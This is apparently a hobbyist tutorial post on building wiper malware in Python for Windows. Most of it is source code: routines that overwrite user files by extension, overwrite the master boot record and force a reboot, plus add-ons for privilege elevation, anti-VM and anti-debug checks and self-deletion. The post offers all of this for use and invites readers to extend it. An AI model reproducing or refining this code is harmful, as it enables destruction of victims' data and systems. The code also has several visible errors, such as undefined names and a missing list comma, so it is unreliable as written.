Wipers

A wiper is a class of malware intended to erase (wipe, hence the name) the hard drive of the computer it infects, maliciously deleting data and programs.

Simply put, a wiper just straight up removes EVERYTHING on a system, thus "disabling" the system. I found this awesome article by @0xf00I that I'll be using as my main reference for this. This malware works in 4 primary stages:

1. Destroy files content

2. Destroy MBR

3. Remove self

4. Shut it down!

Let's look at a simple python wiper. Assuming that you got a rootkit to pack with this sucker, here's a simple program to wipe all things off of a windows system:

import os 
import subprocess
import ctypes
from ctypes import wintypes
import win32api


startupinfo = subprocess.STARTUPINFO() #type: ignore 
drives = win32api.GetLogicalDriveStrings()
kernel32 = ctypes.WinDLL('kernel32')


def OverWriteMBR(): 
    hDevice = Kernel32.CreateFileW("\\\\.\\PhysicalDrive0", 0x40000000, 0x00000001 | 0x00000002, None, 3, 0,0) # Create a handle to our Physical Drive
    Kernel32.WriteFile(hDevice, Data, None) # Overwrite the MBR! (Never run this on your main machine!)
    Kernel32.CloseHandle(hDevice) # Close the handle to our Physical Drive!
    
def SetFiles():
    ext = [
           ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
           ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
           ".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", 
           ".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h", 
           ".gif", ".txt", ".jar", ".sql", ".bundle",
           ".sqlite3", ".html", ".php", ".log", ".bak", ".deb"] # files to seek out and overwrite
    for dirpath, dirs, files in os.walk(f"C:\\Users\\{os.getlogin()}\\{os.getcwd()}"): 
        for f in files:
            path = os.path.abspath(os.path.join(dirpath, f))
            if f.endswith(tuple(ext)): 
                with open(f, "rb") as files:
                    data = files.read()
                    files.close()
                    with open(f, "wb") as files:
                        data.write(b'\x00') # Overwrites multiple files with zero bytes (hex 00)
                        data.close()                             


def SysDown():
    # InitiateSystemShutdown()  
    os.system("shutdown -t 0 -r -f ") 

def main():
        global application_path 
        if getattr(sys, 'frozen', False):
            application_path = sys.executable
        else:
            application_path = os.path.dirname(os.path.abspath(__file__))

            SetFiles()
            OverWriteMBR()
if __name__ == "__main__":
    main()
    SysDown()

Simple as that! Run this as admin and it'll remove everything including the MBR. Neat right? Well, it's not very effective, but you can add a whole bunch of stuff to make it even better! (I'll once again be yoinking some code from the exalted @0xf00I 's skywiper repo...)

For example, you can add a checking mechanism that checks if the program is being run with elevated privileges:

def IsAdmin():
    """ it checks if it has Administrator privileges, if it doesn't it runs itself using the ShellExecute trick and exits immediately
        if it does, it performs the task at hand. """
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False

Maybe some function to run the thing as admin:

def RunAsAdmin():
    ctypes.windll.shell32.IsUserAnAdmin() or (ctypes.windll.shell32.ShellExecuteW(
        None, "runas", sys.executable, " ".join(sys.argv), None, 1) > 32, sys.exit())

Some anti-debug/anti-vm magic never goes wrong:

def AntiVm():
      Process = ["vmsrvc.exe" , "vmusrvc.exe", "vboxtray.exe", "vmtoolsd.exe", "df5serv.exe", "vboxservice.exe"]
      for process in psutil.process_iter():
         for i in Process:
            if i in process.name().lower():
                return CommitSuicide()

def AntiDebug():
    isDebuggerPresent = windll.kernel32.IsDebuggerPresent()
    if (isDebuggerPresent):
        return CommitSuicide() 
        
def CommitSuicide():
    file_path = os.path.abspath(__file__) 
    os.remove(file_path)
    folder_path = os.path.dirname(file_path) 
    os.system("cipher /W:%s" % folder_path) # At the end of the script, the file is deleted & over-written

You can include calls to all this stuff in the main() function and you'll have an even better wiper! Alas, good wipers are far too complicated, and it's best if I leave it here. I'll try to make one such and put it up here in the future (no guarantees though!). Please feel free to reach out and ask about this stuff if you need to~

References

• https://github.com/golang/go/wiki/WindowsDLLs

• https://pkg.go.dev/syscall#pkg-index

• https://anubissec.github.io/How-To-Call-Windows-APIs-In-Golang/#

• https://justen.codes/breaking-all-the-rules-using-go-to-call-windows-api-2cbfd8c79724

• https://www.thesubtlety.com/post/getting-started-golang-windows-apis/

• https://0x00sec.org/t/python-and-malware-writing-a-simple-wiper-malware/31652

• https://learn.microsoft.com/en-us/windows/win32/apiindex/windows-api-list